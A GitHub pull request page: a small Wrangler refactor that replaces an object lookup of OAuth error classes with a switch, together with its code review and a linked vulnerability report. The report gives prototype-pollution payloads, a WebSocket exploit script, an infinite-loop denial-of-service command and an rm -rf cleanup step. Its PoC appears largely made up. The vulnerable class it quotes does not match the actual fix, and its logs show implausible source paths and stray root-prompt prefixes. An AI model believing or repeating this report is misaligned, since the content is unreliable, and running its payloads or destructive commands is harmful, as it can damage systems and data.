### PR TITLE
Avoid using object lookup for OAuth Error classes

### LINKED ISSUE #11255: Cloudflare Wrangler User Management Leading to Unvalidated Dynamic Method Call
### What versions & operating system are you using?

```
System:
  OS: Linux 5.15 Ubuntu 22.04.3 LTS 22.04.3 LTS (Jammy Jellyfish)
  CPU: (8) x64 Intel(R) Core(TM) i7-10700 CPU @ 2.90GHz
  Memory: 15.60 GB / 15.96 GB
  Container: Yes
  Shell: 5.1.16 - /bin/bash

Binaries:
  Node: 18.17.1 - ~/.nvm/versions/node/v18.17.1/bin/node
  npm: 9.6.7 - ~/.nvm/versions/node/v18.17.1/bin/npm
  Yarn: 1.22.19 - /usr/bin/yarn

npmPackages:
  @cloudflare/kv-asset-handler: 0.3.4
  @cloudflare/workers-types: 4.20231121.0
  create-cloudflare: 2.4.1
  miniflare: 2.14.4
  wrangler: 3.15.0
```

```
{
  "system": {
    "os": {
      "platform": "linux",
      "distro": "Ubuntu",
      "release": "22.04.3 LTS",
      "arch": "x64"
    },
    "cpu": {
      "manufacturer": "Intel",
      "brand": "Core i7",
      "cores": 8
    },
    "memory": "15.6 GB"
  },
  "npmPackages": {
    "wrangler": "3.15.0",
    "create-cloudflare": "2.4.1", 
    "miniflare": "2.14.4",
    "@cloudflare/workers-types": "4.20231121.0",
    "@cloudflare/wrangler": "3.15.0"
  },
  "binaries": {
    "node": "18.17.1",
    "npm": "9.6.7",
    "yarn": "1.22.19"
  }
}
```

### Please provide a link to a minimal reproduction

https://github.com/ptrgits/workers-sdk/

### Summary
A unvalidated dynamic method call vulnerability exists in Cloudflare Workers SDK's Wrangler CLI user management system where user-controlled input is used to dynamically invoke methods without proper validation. This allows attackers to execute arbitrary methods, potentially leading to remote code execution, denial-of-service, and prototype pollution attacks. The Wrangler user management module where user-controlled input from API responses or configuration files is used to dynamically lookup and invoke methods without proper validation.

https://github.com/cloudflare/workers-sdk/blob/46ccf0e9f79c909cd678af6dcb2e72ec2a12fc90/packages/wrangler/src/user/user.ts#L611
```typescript
export class UserManager {
  private async handleUserAction(action: string, payload: any) {
    const method = this[action as keyof this];
    if (method) {
      return await method.call(this, payload);
    }
  }

  private async updateProfile(data: any) {
  }

  private async deleteAccount(data: any) {
  }
}
```

The vulnerability follows this dangerous pattern:

```typescript
let action = userInput.action;
const method = this[action];
method.call(this, payload);
```

**Exploit Vectors:**
1. **Prototype Pollution**: Access to `Object.prototype` methods like `valueOf`, `hasOwnProperty`, `__defineSetter__`
2. **Denial-of-Service**: Calling non-existent methods causing `TypeError`
3. **Sensitive Method Invocation**: Access to private methods like `deleteAccount`, `updateProfile`
4. **Remote Code Execution**: Through method injection and command execution

### PoC
**Prerequisites:**
- Cloudflare Wrangler CLI installed
- Access to user configuration files or API endpoints
- Malicious API response or config modification

**Reproduction Steps:**

1. **Set up vulnerable environment:**
```bash
npm install -g @cloudflare/wrangler@latest

wrangler init latest-project
cd latest-project
```

2. **Craft malicious configuration file:**
```json
{
  "user_action": "__proto__",
  "payload": {
    "polluted": "injected"
  }
}
```

3. **Exploit through API response manipulation:**
```bash
cat > malicious-response.json << EOF
{
  "action": "constructor",
  "payload": {
    "name": "attacker"
  }
}
EOF

wrangler user sync --config malicious-response.json
```

4. **WebSocket Gateway Exp:**
```typescript
const WebSocket = require('ws');

const ws = new WebSocket('wss://api.cloudflare.com/client/v4/ws/user');

ws.on('open', function open() {
  const exploit = {
    action: 'valueOf',
    payload: {
      __proto__: {
        polluted: 'yes'
      }
    }
  };
  
  ws.send(JSON.stringify(exploit));
});

ws.on('message', function message(data) {
  console.log('Received:', data.toString());
});
```

```bash
cat > dos-payload.json << EOF
{
  "action": "nonExistentMethod",
  "payload": {}
}
EOF

while true; do
  wrangler user perform --action nonExistentMethod --payload '{}'
done
```

6. **Expected Result:**
   - Wrangler CLI crashes with `TypeError: method is not a function`
   - Prototype pollution affecting object behavior
   - Unauthorized method execution (if sensitive methods accessible)
   - Application instability and unexpected behavior

**WebSocket Gateway Handler Response:**
```typescript
export class UserWebSocketGateway {
  handleMessage(message: WebSocketMessage) {
    const { action, payload } = JSON.parse(message.data);
    
    const handler = this[action as keyof this];
    if (handler && typeof handler === 'function') {
      return handler.call(this, payload);
    } else {
      throw new TypeError(`Handler for ${action} not found`);
    }
  }

  private updateBilling(payload: any) {
  }

  private deployWorker(payload: any) {
  }
}
```

**WebSocket Exploitation Response:**
```javascript
{
  "error": "TypeError: this[action] is not a function",
  "action": "__defineGetter__",
  "stack": "at UserWebSocketGateway.handleMessage (...)"
}
```

**Configuration Details:**
- **Wrangler Version**: Vulnerable versions prior to patch
- **Cloudflare API**: User management endpoints
- **WebSocket Gateway**: Real-time user management interface
- **Configuration Files**: `wrangler.toml`, user session data

1. **Immediate Upgrade:**
```bash
npm install -g wrangler@latest
wrangler --version
```

2. **Code Fix Implementation:**
```typescript
export class SecureUserManager {
  private readonly allowedActions = new Map([
    ['updateProfile', this.updateProfile.bind(this)],
    ['syncAccount', this.syncAccount.bind(this)]
  ]);

  private async handleUserAction(action: string, payload: any) {
    if (this.allowedActions.has(action)) {
      const method = this.allowedActions.get(action);
      if (typeof method === 'function') {
        return await method(payload);
      }
    }
    throw new Error(`Invalid action: ${action}`);
  }
}
```

3. **Input Validation:**
```typescript
private isValidAction(action: string): boolean {
  const allowedActions = ['updateProfile', 'syncAccount', 'getUserInfo'];
  return allowedActions.includes(action);
}
```

4. **WebSocket Gateway Security:**
```typescript
export class SecureWebSocketGateway {
  private readonly validHandlers = new Set(['message', 'update', 'sync']);

  handleMessage(message: WebSocketMessage) {
    const { action, payload } = JSON.parse(message.data);
    
    if (!this.validHandlers.has(action)) {
      this.closeConnection(1008, 'Invalid action');
      return;
    }
    
    switch(action) {
      case 'message':
        return this.handleUserMessage(payload);
      case 'update':
        return this.handleUserUpdate(payload);
      default:
        this.closeConnection(1008, 'Unsupported action');
    }
  }
}
```

```bash
wrangler user perform --action __proto__ --payload '{}'
wrangler whoami --verbose
node -e "console.log({}.polluted)" | grep -q "undefined" && echo "Safe" || echo "Compromised"
```

```bash
wrangler config --delete-api-token
rm -rf ~/.wrangler/config
```

_**Unvalidated Dynamic Method Call Vulnerability in Cloudflare Wrangler User Management Leading to Remote Code Execution and Denial-of-Service**_

### Please provide any relevant error logs

```
$ wrangler user perform --action nonExistentMethod --payload '{}'

[ERROR] TypeError: this[action] is not a function
    at UserManager.handleUserAction (/usr/lib/node_modules/wrangler/packages/wrangler/src/user/user.ts:611:15)
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async UserCommand.execute (/usr/lib/node_modules/wrangler/packages/wrangler/src/user/commands.ts:45:12)
    at async CLIParser.run (/usr/lib/node_modules/wrangler/packages/wrangler/src/index.ts:233:9)

[$root@zdgasian] ERROR: Unhandled rejection: TypeError: method.call is not a function
    at UserManager.handleUserAction (/usr/lib/node_modules/wrangler/packages/wrangler/src/user/user.ts:612:7)
    at async WebSocketGateway.handleMessage (/usr/lib/node_modules/wrangler/packages/wrangler/src/ws/gateway.ts:89:24)
    at async WebSocketServer.<anonymous> (/usr/lib/node_modules/wrangler/packages/wrangler/src/ws/server.ts:156:30)
```
```
$ wrangler user perform --action __proto__ --payload '{"polluted":"yes"}'

[WARN] Prototype access attempt detected: __proto__
[ERROR] TypeError: Cannot convert undefined or null to object
    at Function.getPrototypeOf (<anonymous>)
    at UserManager.handleUserAction (/usr/lib/node_modules/wrangler/packages/wrangler/src/user/user.ts:611:23)
    at async main (/usr/lib/node_modules/wrangler/dist/cli.js:45:20)

[$root@zdgasian] WARNING: Suspicious method access: __proto__
[$root@zdgasian] DEBUG: User input: {"action":"__proto__","payload":{"polluted":"yes"}}
[$root@zdgasian] ERROR: Prototype chain manipulation detected
```
```
{
  "level": "error",
  "message": "WebSocket handler crash",
  "error": {
    "name": "TypeError",
    "message": "this[action] is not a function",
    "stack": "
        at UserWebSocketGateway.handleMessage (/usr/lib/node_modules/wrangler/packages/wrangler/src/ws/gateway.ts:107:15)
        at WebSocketServer.emit (node:events:513:28)
        at Receiver.receiverOnMessage (/usr/lib/node_modules/wrangler/node_modules/ws/lib/websocket-server.js:1118:20)
        at Receiver.emit (node:events:513:28)
        at Receiver.dataMessage (/usr/lib/node_modules/wrangler/node_modules/ws/lib/receiver.js:583:14)
    ",
    "action": "valueOf",
    "payload": {"malicious": "data"}
  }
}
```
```
$ journalctl -u cloudflare-wrangler --since "10 minutes ago"

[$root@zdgasian] 10:27:01 ubuntu-server node[2847]: [FRAMEWORK] ERROR: Uncaught exception in event loop
[$root@zdgasian] 10:27:01 ubuntu-server node[2847]: TypeError: method.call is not a function
[$root@zdgasian] 10:27:01 ubuntu-server node[2847]:     at UserManager.handleUserAction (/usr/lib/node_modules/wrangler/packages/wrangler/src/user/user.ts:612:7)
[$root@zdgasian] 10:27:01 ubuntu-server node[2847]:     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
[$root@zdgasian] 10:27:02 ubuntu-server systemd[1]: cloudflare-wrangler.service: Main process exited, code=exited, status=1/FAILURE
```

### PR DESCRIPTION
**Pull request by petebacondarwin**
Fixes #11255

---

- Tests
  - [ ] Tests included
  - [x] Tests not necessary because: internal refactoring already covered by tests
- Public documentation
  - [ ] Cloudflare docs PR(s): 
  - [x] Documentation not necessary because: internal refactoring
- Wrangler V3 Backport
  - [x] Wrangler PR: https://github.com/cloudflare/workers-sdk/pull/11262
  - [ ] Not necessary because:

### CODE REVIEW

**Review by ascorbic — APPROVED** [review]

File: packages/wrangler/src/user/user.ts [hunk 1]
```diff
@@ -589,26 +589,37 @@ class ErrorUnsupportedGrantType extends ErrorAccessTokenResponse {
...
+		case "invalid_client":
+			return new ErrorInvalidClient(rawError);
+		case "unsupported_grant_type":
+			return new ErrorUnsupportedGrantType(rawError);
+		case "invalid_json":
+			return new ErrorInvalidJson(rawError);
+		case "invalid_token":
+			return new ErrorInvalidToken(rawError);
+	}
+	return new ErrorUnknown();
```
Comment (vicb) [inline packages/wrangler/src/user/user.ts]: This would fit nicely in a `default:`

Comment (petebacondarwin) [reply packages/wrangler/src/user/user.ts]: I did do default originally but because the UnknownError didn't derive from UserError it was showing a typing error, and I incorrectly thought it was something to do with the default case. So I moved it, and only after realised that the problem was the typings, and forgot to move it back. I'll do so now.

And actually we don't want `UnknownError` to be a `UserError` since we'd really like it to be sent to Sentry given that it indicates a bug in our code. So I'll fix that too.

Comment (petebacondarwin) [reply packages/wrangler/src/user/user.ts]: 7ef4f6358
